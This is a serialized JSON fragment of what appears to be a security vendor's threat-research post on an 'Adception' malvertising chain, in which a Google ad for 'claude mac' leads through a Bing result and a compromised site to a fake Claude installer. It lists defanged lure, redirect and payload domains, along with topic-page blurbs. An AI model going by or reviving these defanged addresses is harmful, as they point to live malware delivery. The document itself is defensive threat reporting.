ID",{"data":1362,"content":1363,"nodeType":823},{},[1364],{"data":1365,"content":1366,"nodeType":498},{},[1367],{"data":1368,"marks":1369,"value":1370,"nodeType":497},{},[],"gad_campaignid=24303361122",{"data":1372,"content":1373,"nodeType":857},{},[1374,1384],{"data":1375,"content":1376,"nodeType":823},{},[1377],{"data":1378,"content":1379,"nodeType":498},{},[1380],{"data":1381,"marks":1382,"value":1383,"nodeType":497},{},[],"Lure\u002Fdelivery",{"data":1385,"content":1386,"nodeType":823},{},[1387,1394,1401,1408,1415,1422,1429,1436],{"data":1388,"content":1389,"nodeType":498},{},[1390],{"data":1391,"marks":1392,"value":1393,"nodeType":497},{},[],"Claude-desk-code[.]com",{"data":1395,"content":1396,"nodeType":498},{},[1397],{"data":1398,"marks":1399,"value":1400,"nodeType":497},{},[],"ksmgakajgpsals.pages[.]dev",{"data":1402,"content":1403,"nodeType":498},{},[1404],{"data":1405,"marks":1406,"value":1407,"nodeType":497},{},[],"rapid-craft567[.]com",{"data":1409,"content":1410,"nodeType":498},{},[1411],{"data":1412,"marks":1413,"value":1414,"nodeType":497},{},[],"too.clawddddd[.]com",{"data":1416,"content":1417,"nodeType":498},{},[1418],{"data":1419,"marks":1420,"value":1421,"nodeType":497},{},[],"fine-byte2[.]com",{"data":1423,"content":1424,"nodeType":498},{},[1425],{"data":1426,"marks":1427,"value":1428,"nodeType":497},{},[],"fairpoint29[.]com",{"data":1430,"content":1431,"nodeType":498},{},[1432],{"data":1433,"marks":1434,"value":1435,"nodeType":497},{},[],"turbowave45[.]com",{"data":1437,"content":1438,"nodeType":498},{},[1439],{"data":1440,"marks":1441,"value":1442,"nodeType":497},{},[],"cli-desktop[.]com",{"data":1444,"content":1445,"nodeType":857},{},[1446,1456],{"data":1447,"content":1448,"nodeType":823},{},[1449],{"data":1450,"content":1451,"nodeType":498},{},[1452],{"data":1453,"marks":1454,"value":1455,"nodeType":497},{},[],"Redirect",{"data":1457,"content":1458,"nodeType":823},{},[1459],{"data":1460,"content":1461,"nodeType":498},{},[1462],{"data":1463,"marks":1464,"value":1465,"nodeType":497},{},[],"homeopatiaalemana[.]com\u002Fquienes-somos\u002F",{"data":1467,"content":1468,"nodeType":857},{},[1469,1479],{"data":1470,"content":1471,"nodeType":823},{},[1472],{"data":1473,"content":1474,"nodeType":498},{},[1475],{"data":1476,"marks":1477,"value":1478,"nodeType":497},{},[],"Payload (resolves to)",{"data":1480,"content":1481,"nodeType":823},{},[1482],{"data":1483,"content":1484,"nodeType":498},{},[1485],{"data":1486,"marks":1487,"value":1488,"nodeType":497},{},[],"lake-90[.]com\u002Fcurl\u002Finhgup9a\u002Fa90fkbqdg8d0mus64oh8dw.dat",{"data":1490,"content":1491,"nodeType":857},{},[1492,1502],{"data":1493,"content":1494,"nodeType":823},{},[1495],{"data":1496,"content":1497,"nodeType":498},{},[1498],{"data":1499,"marks":1500,"value":1501,"nodeType":497},{},[],"Command",{"data":1503,"content":1504,"nodeType":823},{},[1505],{"data":1506,"content":1507,"nodeType":498},{},[1508],{"data":1509,"marks":1510,"value":1155,"nodeType":497},{},[],{"data":1512,"content":1513,"nodeType":498},{},[1514],{"data":1515,"marks":1516,"value":41,"nodeType":497},{},[],"document",{"entries":1519},{"hyperlink":1520,"inline":1521,"block":1522},[],[],[1523,1531,1558,1564,1570,1577,1583,1590],{"sys":1524,"__typename":1525,"title":1526,"caption":1526,"layoutMode":33,"file":1527},{"id":520},"Image","A Google Search ad for Bing leads to a fake \"Download Claude\" page",{"url":1528,"width":1529,"height":1530},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3hNc5e1RfLOP6Ev2OcBlJq\u002Ff14059f550f9154ea1ab97f448d78a3a\u002Fimage1.png",1999,909,{"sys":1532,"__typename":1533,"content":1534,"name":1557,"title":33},{"id":628},"InsightTextBlockComponent",{"json":1535},{"nodeType":1517,"data":1536,"content":1537},{},[1538],{"nodeType":498,"data":1539,"content":1540},{},[1541,1545,1553],{"nodeType":497,"value":1542,"marks":1543,"data":1544},"The Push team also found attackers who had configured their own Microsoft tenant to federate sign-in through an ADFS server they controlled, so a ",[],{},{"nodeType":582,"data":1546,"content":1548},{"uri":1547},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fphishing-with-active-directory-federation-services\u002F",[1549],{"nodeType":497,"value":1550,"marks":1551,"data":1552},"legitimate office.com link sent victims through Microsoft's login flow and on to the attacker's phishing page",[],{},{"nodeType":497,"value":1554,"marks":1555,"data":1556},", which was also promoted through a Google ad.",[],{},"Adception IB1",{"sys":1559,"__typename":1525,"title":1560,"caption":1560,"layoutMode":33,"file":1561},{"id":797},"A Google Search for \"claude mac\" returns an ad for Bing",{"url":1562,"width":1529,"height":1563},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1PCCF6fC032ZE7G2IA2bA8\u002F5e0e915414b51692da37c90c025d6e4c\u002Fimage4.png",1819,{"sys":1565,"__typename":1525,"title":1566,"caption":1566,"layoutMode":33,"file":1567},{"id":1033},"Network events when accessing from the approved path.",{"url":1568,"width":1529,"height":1569},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F60j3rt1ZOQ7DY2P4pK1z95\u002F3260cd266f3b0127c239a2b9d3d15c6c\u002Fimage6.png",860,{"sys":1571,"__typename":1525,"title":1572,"caption":1572,"layoutMode":33,"file":1573},{"id":1057},"Bing click-tracking redirect",{"url":1574,"width":1575,"height":1576},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6HXXmZKOfJFXB5yCS3n6DE\u002F200536f194d8f5e0f2657dd2ff192220\u002Fimage3_1.png",2953,345,{"sys":1578,"__typename":1525,"title":1579,"caption":1579,"layoutMode":33,"file":1580},{"id":1070},"Compromised website used in the redirect chain",{"url":1581,"width":1529,"height":1582},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4PTT6bpZ54yN0fiRwm7OV1\u002F817182f18f7b0f60a5fced8459b55197\u002Fimage7.png",1200,{"sys":1584,"__typename":1525,"title":1585,"caption":1585,"layoutMode":33,"file":1586},{"id":1132},"Fake Claude download page",{"url":1587,"width":1588,"height":1589},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2fC8sct9LsqGP0iLupm61q\u002F955b8d288b43e7bc7b882b7f82314398\u002Fimage__1__2.png",2280,1338,{"sys":1591,"__typename":1525,"title":1592,"caption":1592,"layoutMode":33,"file":1593},{"id":1138},"InstallFix lure for Claude",{"url":1594,"width":1529,"height":1595},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6kW4LCjjcOu5XpgayMRypZ\u002Ffb238bbae530b02291bd64f80c79b0a4\u002Fimage4.png",1174,"json",{"items":1598},[],{},"Analysing a novel malicious redirect and cloaking technique","threat-research","2026-10-09T00:00:00.000Z",{"items":1604},[1605,1618,1631],{"__typename":1606,"sys":1607,"title":1609,"synopsis":1610,"publishedDate":1602,"slug":1611,"authorsCollection":1612},"BlogPosts",{"id":1608},"3SEfSmEmM5aExjQF03DBIu","Analyzing the latest AI-themed malware delivery attacks","We’re tracking a cluster of AI-themed attacks that are an interesting development on the InstallFix and LLMshare techniques we reported earlier this year. ","analyzing-the-latest-ai-themed-malware-delivery-attacks",{"items":1613},[1614],{"firstName":1615,"profilePicture":1616},"Dan",{"url":1617},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7jik1VhFgA3kgzXBXTm2Vw\u002Ffcd8c171da644903d0827eafcfbcaad0\u002FDan_Headshot_2025.png",{"__typename":1606,"sys":1619,"title":1621,"synopsis":1622,"publishedDate":1623,"slug":1624,"authorsCollection":1625},{"id":1620},"Gcg7PGuICrlRcqq1QFXxH","LLMShare: how attackers are turning AI chatbot pages into malware delivery platforms","How attackers are using shared content features on AI chatbot platforms to deliver malware via pages hosted on legitimate domains, sent via malvertising.","2026-05-29T00:00:00.000Z","llmshare-malvertising-campaign",{"items":1626},[1627],{"firstName":1628,"profilePicture":1629},"Keanu",{"url":1630},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FVCGOm62jiocjwngWTh32U\u002Fe9a30637b1c76bf988d2fec90f5b6c36\u002F1689361049351_1.png",{"__typename":1606,"sys":1632,"title":1634,"synopsis":1635,"publishedDate":1636,"slug":1637,"authorsCollection":1638},{"id":1633},"3cLkjEBzRdI2CTq6oNohab","The state of ClickFix: what Push detection data tells us in H2 2026","Diving into our ClickFix data to give you the key trends and developments as we close out 2026. ","2026-09-23T00:00:00.000Z","the-state-of-clickfix-by-detection-data",{"items":1639},[1640],{"firstName":1615,"profilePicture":1641},{"url":1617},"adception-malvertising-another-search-engines-search-results","blog\u002Fadception-malvertising-another-search-engines-search-results",{"json":1645},{"data":1646,"content":1647,"nodeType":1517},{},[1648],{"data":1649,"content":1650,"nodeType":498},{},[1651],{"data":1652,"marks":1653,"value":1654,"nodeType":497},{},[],"Push recently detected an attack that began with a Google search ad for \"claude mac\" whose destination was a Bing search result, which passed the victim through a compromised retail website to a fake Claude installer. This led us to discover a crafty redirect and cloaking technique that we’re (unseriously) referring to as “Adception”. ","Analysing a crafty redirect and cloaking technique that we’re (unseriously) referring to as “Adception”.",{"id":1657,"publishedAt":1658},"1U3hJzoobgnh9oRtzuMfMR","2026-10-09T09:44:52.067Z",{"items":1660},[1661],{"sys":1662,"name":1664},{"id":1663},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"items":1666},[1667,1672,1677,1682,1687,1692,1697,1702,1707,1711],{"sys":1668,"name":1670,"slug":1671,"tier":29},{"id":1669},"topic-browser-attacks","Browser attacks","browser-attacks",{"sys":1673,"name":1675,"slug":1676,"tier":45},{"id":1674},"topic-malvertising","Malvertising","malvertising",{"sys":1678,"name":1680,"slug":1681,"tier":45},{"id":1679},"topic-clickfix","ClickFix","clickfix",{"sys":1683,"name":1685,"slug":1686,"tier":45},{"id":1684},"topic-ai-attacks","AI attacks","ai-attacks",{"sys":1688,"name":1690,"slug":1691,"tier":45},{"id":1689},"topic-social-engineering","Social engineering","social-engineering",{"sys":1693,"name":1695,"slug":1696,"tier":45},{"id":1694},"topic-malware-delivery","Malware delivery","malware-delivery",{"sys":1698,"name":1700,"slug":1701,"tier":45},{"id":1699},"topic-infostealer","Infostealer","infostealer",{"sys":1703,"name":1705,"slug":1706,"tier":45},{"id":1704},"topic-identity-attacks","Identity attacks","identity-attacks",{"sys":1708,"name":185,"slug":1710,"tier":45},{"id":1709},"topic-session-hijacking","session-hijacking",{"sys":1712,"name":1714,"slug":1715,"tier":29},{"id":1713},"topic-threat-landscape","Threat landscape","threat-landscape","jUx0txCZzP3uJDpP7r1fyHdvS9zB7PSm5nm8Abofxwg",{"id":1718,"extension":1596,"items":1719,"meta":2113,"stem":2114,"__hash__":2115},"blogTopics\u002Fblogtopics.json",[1720,1729,1735,1744,1753,1762,1768,1777,1786,1795,1801,1810,1818,1827,1835,1843,1852,1861,1870,1878,1884,1893,1899,1908,1914,1920,1929,1938,1947,1956,1964,1973,1982,1990,1999,2008,2017,2026,2035,2041,2050,2059,2068,2073,2081,2090,2099,2105],{"sys":1721,"faqItemsCollection":1723,"name":1725,"slug":1726,"tier":29,"intro":1727,"faqTitle":33,"postCount":1728,"hasPage":60},{"id":1722},"topic-ai",{"items":1724},[],"AI","ai","AI is reshaping both sides of the security equation: employees adopt AI tools faster than security teams can track them, while attackers use AI to scale and automate campaigns. Shadow AI adoption may now outpace wider shadow SaaS, and attackers are already turning AI chatbot platforms into malware delivery channels. Push has researched the offensive potential of computer-using agents and now applies AI agents to its own threat hunting. This hub covers AI as risk, target, and defensive tool.",23,{"sys":1730,"faqItemsCollection":1731,"name":1685,"slug":1686,"tier":45,"intro":1733,"faqTitle":33,"postCount":1734,"hasPage":60},{"id":1684},{"items":1732},[],"AI attacks run in both directions: attackers using AI to scale phishing, malware delivery, and identity attacks, and AI platforms themselves becoming the attack surface. Push has researched how computer-using agents can automate identity attacks, and has seen the poisoned tenant technique it coined used against its own employees in the wild.",26,{"sys":1736,"faqItemsCollection":1738,"name":1740,"slug":1741,"tier":45,"intro":1742,"faqTitle":33,"postCount":1743,"hasPage":60},{"id":1737},"topic-ai-governance",{"items":1739},[],"AI governance","ai-governance","AI governance is how organizations set and enforce rules for workplace AI use — which tools are allowed, what data can enter them, and how to evidence it to regulators. With US, EU, and UK AI regulations converging on obligations most organizations can’t yet meet, Push’s research makes the case that enforcement starts in the browser, where AI tools are actually used.",10,{"sys":1745,"faqItemsCollection":1747,"name":1749,"slug":1750,"tier":45,"intro":1751,"faqTitle":33,"postCount":1752,"hasPage":60},{"id":1746},"topic-aitm",{"items":1748},[],"AiTM phishing","aitm","Adversary-in-the-middle (AiTM) phishing proxies a real login page through an attacker-controlled site, capturing credentials, MFA codes, and session tokens in real time to bypass multi-factor authentication. Push’s research into kits like Evilginx and Sneaky2FA documents how they evade URL- and signature-based detection — and why analyzing toolkit behavior in the browser catches attacks that blocklists miss.",78,{"sys":1754,"faqItemsCollection":1756,"name":1758,"slug":1759,"tier":45,"intro":1760,"faqTitle":33,"postCount":1761,"hasPage":60},{"id":1755},"topic-bec",{"items":1757},[],"BEC","bec","Business email compromise (BEC) turns a hijacked mailbox into a fraud tool: attackers use mail rules, auto-forwarding, and payment redirection to steal money while staying invisible to the account owner. Alongside a first-hand case study of a BEC attack that nearly cost an engineering firm millions, Push breaks down these mailbox persistence tricks and how to detect them.",5,{"sys":1763,"faqItemsCollection":1764,"name":1670,"slug":1671,"tier":29,"intro":1766,"faqTitle":33,"postCount":1767,"hasPage":60},{"id":1669},{"items":1765},[],"Browser attacks target users through the web pages, sessions, and extensions they rely on every day — bypassing endpoint and network defenses that never see inside the browser. Techniques like AiTM phishing kits, ClickFix-style copy-paste attacks, OAuth consent abuse, malvertising, and browser sync abuse have become a leading path to account takeover. Push researchers analyze these attacks in the wild, from infiltrating criminal phishing panels to dissecting toolkits like ConsentFix and Sneaky2FA. Use this hub to track how the techniques evolve and how to defend against them.",126,{"sys":1769,"faqItemsCollection":1771,"name":1773,"slug":1774,"tier":45,"intro":1775,"faqTitle":33,"postCount":1776,"hasPage":60},{"id":1770},"topic-browser-extensions",{"items":1772},[],"Browser extensions","browser-extensions","Browser extensions cut both ways for security teams: malicious or compromised extensions are a growing attack vector, while an extension is also the lightest-weight way to deploy security controls into the browsers employees already use. These posts cover both sides — extension-borne risks like browser sync attacks and the limits of risk scoring, and how Push uses its extension to detect threats and block risky extensions.",31,{"sys":1778,"faqItemsCollection":1780,"name":1782,"slug":1783,"tier":29,"intro":1784,"faqTitle":33,"postCount":1785,"hasPage":60},{"id":1779},"topic-browser-security",{"items":1781},[],"Browser security","browser-security","Work now happens in the browser, making browser security — visibility and control at the point where users meet the web — a core layer of enterprise defense. Endpoint, network, and email tools miss attacks that unfold inside the browser session, from AiTM phishing to risky extensions and shadow SaaS. Push has published extensively on choosing between enterprise browsers and browser extensions, using browser telemetry, and making the business case for browser security. Start here for both strategy and hands-on guidance.",130,{"sys":1787,"faqItemsCollection":1789,"name":1791,"slug":1792,"tier":45,"intro":1793,"faqTitle":33,"postCount":1794,"hasPage":60},{"id":1788},"topic-casb",{"items":1790},[],"CASB","casb","Cloud access security brokers (CASBs) govern cloud app usage through API integrations and network proxies — an approach that works for sanctioned apps but struggles with the long tail of shadow SaaS employees adopt on their own. Because every SaaS signup happens in a browser, Push captures that adoption in real time at the point of login, and these posts cover what proxy-based discovery misses.",12,{"sys":1796,"faqItemsCollection":1797,"name":1680,"slug":1681,"tier":45,"intro":1799,"faqTitle":33,"postCount":1800,"hasPage":60},{"id":1679},{"items":1798},[],"ClickFix attacks trick users into copying and running malicious commands themselves — typically through fake CAPTCHA, error, or fix-it prompts — so malware executes without a download for security tools to scan. Push researchers track the technique’s evolution in the wild and identified the ConsentFix and InstallFix variants, which extend it to OAuth consent grants and fake install guides.",43,{"sys":1802,"faqItemsCollection":1804,"name":1806,"slug":1807,"tier":45,"intro":1808,"faqTitle":33,"postCount":1809,"hasPage":60},{"id":1803},"topic-credential-phishing",{"items":1805},[],"Credential phishing","credential-phishing","Credential phishing steals usernames and passwords through fake login pages impersonating the services employees use, handing attackers direct access to corporate accounts. Attackers don’t hack in — they log in. Push’s browser extension analyzes login pages as users actually see them, blocking cloned pages and stopping employees from entering company passwords on lookalike sites.",90,{"sys":1811,"faqItemsCollection":1813,"name":180,"slug":1815,"tier":45,"intro":1816,"faqTitle":33,"postCount":1817,"hasPage":60},{"id":1812},"topic-credential-stuffing",{"items":1814},[],"credential-stuffing","Credential stuffing is an attack where criminals replay username-password pairs stolen from one breach against other services, exploiting password reuse to take over accounts. Major breaches have shown how far a single set of stolen credentials can travel. Push detects verified stolen credentials by comparing employee passwords against breach datasets and dark-web threat intelligence, eliminating false positives.",64,{"sys":1819,"faqItemsCollection":1821,"name":1823,"slug":1824,"tier":29,"intro":1825,"faqTitle":33,"postCount":1826,"hasPage":60},{"id":1820},"topic-detection-and-response",{"items":1822},[],"Detection & response","detection-and-response","Detection and response is being reshaped as attacks move into the browser, where EDR, SIEM, and network tools have limited visibility. Modern phishing kits evade signature-based detection, and most malicious pages have never been seen before — so technique-level, in-browser detection matters more than known-bad indicators. Push’s work here spans high-fidelity browser telemetry, session token theft detection, and agentic threat hunting, plus practical IR guidance for compromised SaaS accounts and malicious OAuth apps. These posts cover both the philosophy and the workflows.",103,{"sys":1828,"faqItemsCollection":1830,"name":1832,"slug":1833,"tier":45,"intro":1834,"faqTitle":33,"postCount":1800,"hasPage":60},{"id":1829},"topic-detection-engineering",{"items":1831},[],"Detection engineering","detection-engineering","Detection engineering turns threat research into reliable, high-fidelity detections — and as AI accelerates the churn of attacker infrastructure, indicator-based detection is collapsing in favor of technique-level approaches. Here you’ll find teardowns of AiTM kits, ClickFix pages, and malvertising campaigns, alongside Push’s own account of building an agentic threat hunting pipeline that turns hunts into shipped detections.",{"sys":1836,"faqItemsCollection":1838,"name":141,"slug":1840,"tier":45,"intro":1841,"faqTitle":33,"postCount":1842,"hasPage":60},{"id":1837},"topic-device-code-phishing",{"items":1839},[],"device-code-phishing","Device code phishing abuses the OAuth device authorization flow: attackers generate a legitimate sign-in code, trick the victim into entering it on the vendor’s real login page, and walk away with access tokens — no fake site or password capture required. Push research tracked a sharp spike in adoption during 2026 as attackers use the technique to sidestep standard access controls.",24,{"sys":1844,"faqItemsCollection":1846,"name":1848,"slug":1849,"tier":45,"intro":1850,"faqTitle":33,"postCount":1851,"hasPage":60},{"id":1845},"topic-dlp",{"items":1847},[],"DLP","dlp","Data loss prevention (DLP) is the practice of stopping sensitive data from leaving your control — a problem that has shifted from email and endpoints to the browser, where employees move data into SaaS and AI tools. Push applies controls at that point of use, from keeping corporate credentials out of personal password managers to governing what flows into unsanctioned apps.",16,{"sys":1853,"faqItemsCollection":1855,"name":1857,"slug":1858,"tier":45,"intro":1859,"faqTitle":33,"postCount":1860,"hasPage":60},{"id":1854},"topic-edr",{"items":1856},[],"EDR","edr","Endpoint detection and response (EDR) watches processes, files, and memory on the device — a vantage point that never sees the phishing pages, stolen sessions, and identity attacks playing out inside the browser. That’s not an EDR failure; attackers have simply moved where it can’t follow. These posts map that gap and show how Push pairs browser-level detection and response with endpoint security to close it.",27,{"sys":1862,"faqItemsCollection":1864,"name":1866,"slug":1867,"tier":45,"intro":1868,"faqTitle":33,"postCount":1869,"hasPage":60},{"id":1863},"topic-enterprise-browser",{"items":1865},[],"Enterprise browser","enterprise-browser","An enterprise browser is a standalone, security-hardened browser that organizations deploy in place of Chrome, Edge, or other defaults. The real buying question is whether replacing the browser beats securing the browsers employees already use — a trade-off these posts examine directly, alongside analysis of Omdia’s secure enterprise browser market report and Push’s framework for weighing full browsers against extension-based deployment.",9,{"sys":1871,"faqItemsCollection":1873,"name":170,"slug":1875,"tier":45,"intro":1876,"faqTitle":33,"postCount":1877,"hasPage":60},{"id":1872},"topic-ghost-logins",{"items":1874},[],"ghost-logins","Ghost logins are overlooked authentication routes into an account — like a password login lingering behind SSO, or a forgotten secondary auth method — that attackers exploit for account takeover and persistence. Push coined the term after research showing how these forgotten login paths let attackers sidestep the MFA and SSO controls guarding an account’s primary sign-in method.",48,{"sys":1879,"faqItemsCollection":1880,"name":1705,"slug":1706,"tier":45,"intro":1882,"faqTitle":33,"postCount":1883,"hasPage":60},{"id":1704},{"items":1881},[],"Identity attacks target user accounts rather than infrastructure — phishing credentials, stealing sessions, abusing OAuth grants — because logging in is easier than hacking in. Identity-based techniques are now the leading cause of breaches. Push’s offensive research maps these techniques continuously, coining attacks like SAMLjacking and the poisoned tenant before they appeared in the wild.",59,{"sys":1885,"faqItemsCollection":1887,"name":1889,"slug":1890,"tier":29,"intro":1891,"faqTitle":33,"postCount":1892,"hasPage":60},{"id":1886},"topic-identity-security",{"items":1888},[],"Identity security","identity-security","Identity security is the practice of protecting workforce accounts, credentials, and sessions — the primary route attackers now use to breach organizations. Instead of hacking in, attackers log in: through phished credentials, stolen session tokens, MFA bypass, and forgotten ghost logins. Push’s research team documents these techniques continuously, from cross-IdP impersonation and SAMLjacking to analyses of major identity-driven breaches. This hub collects that research alongside practical guidance on MFA, SSO, and stopping account takeover.",154,{"sys":1894,"faqItemsCollection":1895,"name":1700,"slug":1701,"tier":45,"intro":1897,"faqTitle":33,"postCount":1898,"hasPage":60},{"id":1699},{"items":1896},[],"Infostealers are malware built to harvest saved passwords, cookies, and session tokens from infected devices, supplying the stolen credentials behind some of the most consequential breaches of recent years. Push traces the ecosystem trading this data and checks employee passwords against threat intel feeds, flagging verified stolen credentials before attackers can log in with them.",56,{"sys":1900,"faqItemsCollection":1902,"name":1904,"slug":1905,"tier":45,"intro":1906,"faqTitle":33,"postCount":1907,"hasPage":60},{"id":1901},"topic-legitimate-service-abuse",{"items":1903},[],"Legitimate service abuse","legitimate-service-abuse","Legitimate service abuse means staging attacks on trusted platforms — Google Ads, AI chatbot share pages, office.com links, Slack, SaaS tenants — so malicious content inherits the reputation of the service hosting it. Push research has documented the pattern repeatedly, from malvertising run through hijacked Google Ad Manager accounts to phishing links generated by Active Directory Federation Services.",29,{"sys":1909,"faqItemsCollection":1910,"name":1675,"slug":1676,"tier":45,"intro":1912,"faqTitle":33,"postCount":1913,"hasPage":60},{"id":1674},{"items":1911},[],"Malvertising uses paid search and display ads to put phishing pages and malware in front of users, often by impersonating trusted brands at the top of Google results. Push tracks these campaigns continuously — intercepting live attacks spoofing well-known brands — and has documented how criminals hijack Google Ads accounts to fund and run them.",34,{"sys":1915,"faqItemsCollection":1916,"name":1695,"slug":1696,"tier":45,"intro":1918,"faqTitle":33,"postCount":1919,"hasPage":60},{"id":1694},{"items":1917},[],"Malware delivery has moved into the browser: rather than email attachments, attackers now rely on malvertising, fake install guides, and ClickFix-style copy-paste lures to get code running on endpoints. Push research on techniques like InstallFix maps the playbook, and in-browser detection of malicious copy and paste blocks these attacks before commands reach the endpoint.",17,{"sys":1921,"faqItemsCollection":1923,"name":1925,"slug":1926,"tier":45,"intro":1927,"faqTitle":33,"postCount":1928,"hasPage":60},{"id":1922},"topic-mfa",{"items":1924},[],"MFA","mfa","Multi-factor authentication (MFA) requires a second proof of identity beyond a password, and it remains one of the most effective controls against account takeover. Regulators from Cyber Essentials to NYDFS now mandate it across cloud services. Push enforces MFA in the browser on third-party apps — even those with no native enforcement option — and shows security teams where coverage gaps remain.",83,{"sys":1930,"faqItemsCollection":1932,"name":1934,"slug":1935,"tier":45,"intro":1936,"faqTitle":33,"postCount":1937,"hasPage":60},{"id":1931},"topic-mfa-bypass",{"items":1933},[],"MFA bypass","mfa-bypass","MFA bypass covers the techniques attackers use to defeat multi-factor authentication — AiTM phishing kits, consent phishing, device code phishing, and MFA downgrade attacks among them. None of these break the second factor; they route around it. Push researchers regularly get hands-on with phishing kits like Evilginx and Sneaky2FA, analyzing how these attacks work in the wild and how they evolve.",60,{"sys":1939,"faqItemsCollection":1941,"name":1943,"slug":1944,"tier":45,"intro":1945,"faqTitle":33,"postCount":1946,"hasPage":60},{"id":1940},"topic-non-email-phishing",{"items":1942},[],"Non-email phishing","non-email-phishing","Non-email phishing delivers malicious links through channels your secure email gateway never sees — social media messages, IM apps like Slack and Teams, search ads, and SMS. Push has intercepted live campaigns arriving via LinkedIn DMs, malvertising, and messaging platforms, which is why it detects phishing pages in the browser at the point of click, regardless of delivery channel.",53,{"sys":1948,"faqItemsCollection":1950,"name":1952,"slug":1953,"tier":45,"intro":1954,"faqTitle":33,"postCount":1955,"hasPage":60},{"id":1949},"topic-oauth-abuse",{"items":1951},[],"OAuth abuse","oauth-abuse","OAuth abuse is attackers exploiting app-to-app authorization — consent phishing, malicious OAuth apps, stolen tokens, and device code flows — to gain persistent access to cloud tenants without touching a password or MFA prompt. Push tracks these techniques continuously and discovered ConsentFix, a browser-native attack in the wild that pairs OAuth consent phishing with a ClickFix-style prompt.",70,{"sys":1957,"faqItemsCollection":1959,"name":1961,"slug":1962,"tier":45,"intro":1963,"faqTitle":33,"postCount":1728,"hasPage":60},{"id":1958},"topic-passkeys",{"items":1960},[],"Passkeys","passkeys","Passkeys are phishing-resistant credentials that replace passwords with cryptographic key pairs bound to a user’s device. They defeat conventional credential phishing, but attackers adapt: Push research has documented MFA downgrade, app-specific password phishing, and device code phishing being used in the wild to route around passkey-protected accounts. Deploying passkeys is step one; closing those fallback paths is step two.",{"sys":1965,"faqItemsCollection":1967,"name":1969,"slug":1970,"tier":45,"intro":1971,"faqTitle":33,"postCount":1972,"hasPage":60},{"id":1966},"topic-password-security",{"items":1968},[],"Password security","password-security","Password security is the practice of keeping workforce credentials strong, unique, and out of attackers’ hands — still a frontline defense while most SaaS logins depend on passwords. Expiration policies don’t fix weak or reused passwords; visibility does. Push observes real logins in the browser to flag weak, reused, and breached passwords and guide employees to reset them on any app.",80,{"sys":1974,"faqItemsCollection":1976,"name":1978,"slug":1979,"tier":45,"intro":1980,"faqTitle":33,"postCount":1981,"hasPage":60},{"id":1975},"topic-phaas",{"items":1977},[],"PhaaS","phaas","Phishing-as-a-service (PhaaS) platforms sell ready-made phishing kits, hosted infrastructure, and management panels on subscription, letting low-skill criminals run MFA-bypassing campaigns at scale. Kits like Evilginx, Tycoon2FA, Sneaky2FA, FlowerStorm, and EvilTokens each add their own evasion and session-theft capabilities, and new entrants appear regularly. Push researchers continuously get hands-on with these tools — investigating attacks in the wild, reverse-engineering kit behavior, and turning that research into detections.",41,{"sys":1983,"faqItemsCollection":1985,"name":126,"slug":1987,"tier":29,"intro":1988,"faqTitle":33,"postCount":1989,"hasPage":60},{"id":1984},"topic-phishing",{"items":1986},[],"phishing","Phishing remains the most common way attackers compromise business accounts — and it has moved far beyond suspicious emails. Modern campaigns use AiTM toolkits that bypass MFA, consent phishing against OAuth, device code phishing, and lures delivered through malvertising, LinkedIn, and Slack. Push detects and blocks these attacks in the browser, and its researchers publish teardowns of live campaigns and kits like Evilginx and Sneaky2FA. Read on for how phishing actually works today and what stops it.",94,{"sys":1991,"faqItemsCollection":1993,"name":1995,"slug":1996,"tier":45,"intro":1997,"faqTitle":33,"postCount":1998,"hasPage":60},{"id":1992},"topic-public-breach",{"items":1994},[],"Public breach","public-breach","Public breaches are the disclosed incidents that show how attacks actually unfold once the headlines fade. Push’s breach analyses keep finding identity at the entry point: stolen credentials, OAuth abuse, and missing MFA recur across the incidents analyzed here.",30,{"sys":2000,"faqItemsCollection":2002,"name":2004,"slug":2005,"tier":45,"intro":2006,"faqTitle":33,"postCount":2007,"hasPage":60},{"id":2001},"topic-ransomware",{"items":2003},[],"Ransomware","ransomware","Ransomware attacks increasingly begin with an identity, not an exploit: stolen credentials, MFA bypass, and help desk scams give operators their initial foothold. The analysis here follows that front end of the kill chain — how identity compromise leads to ransomware deployment, and the breaches driving regulators toward tighter MFA requirements.",14,{"sys":2009,"faqItemsCollection":2011,"name":2013,"slug":2014,"tier":29,"intro":2015,"faqTitle":33,"postCount":2016,"hasPage":60},{"id":2010},"topic-saas-security",{"items":2012},[],"SaaS security","saas-security","SaaS security means protecting the sprawl of cloud apps, accounts, and integrations your employees adopt — often without IT ever knowing. Shadow SaaS, risky OAuth grants, ghost logins, and unmanaged third-party access create attack paths traditional controls can’t see, as recent high-profile breaches have demonstrated. Building on the original SaaS attack matrix, Push continues to map SaaS-native attack techniques alongside practical guides for discovering and securing unsanctioned apps, and this hub gathers all of it.",97,{"sys":2018,"faqItemsCollection":2020,"name":2022,"slug":2023,"tier":45,"intro":2024,"faqTitle":33,"postCount":2025,"hasPage":6},{"id":2019},"topic-security-training",{"items":2021},[],"Security training","security-training","Security training aims to teach employees to recognize and avoid attacks — yet modern phishing routinely fools even seasoned security professionals. Push argues that training budgets work harder as real-time, in-browser intervention: guardrails and warnings at the moment of risk, rather than lessons employees must recall under pressure.",4,{"sys":2027,"faqItemsCollection":2029,"name":2031,"slug":2032,"tier":45,"intro":2033,"faqTitle":33,"postCount":2034,"hasPage":60},{"id":2028},"topic-seo-poisoning",{"items":2030},[],"SEO poisoning","seo-poisoning","SEO poisoning manipulates search engine results so malicious pages rank prominently for the software, tools, or services users are actively searching for, turning a routine search into an infection vector. It often pairs with malvertising and ClickFix-style payloads — Push has documented attackers abusing shared pages on legitimate AI chatbot domains to deliver malware from trusted infrastructure.",8,{"sys":2036,"faqItemsCollection":2037,"name":185,"slug":1710,"tier":45,"intro":2039,"faqTitle":33,"postCount":2040,"hasPage":60},{"id":1709},{"items":2038},[],"Session hijacking is the theft of an authenticated session — usually via stolen session cookies or tokens — letting attackers walk past passwords and MFA into a live account. AiTM 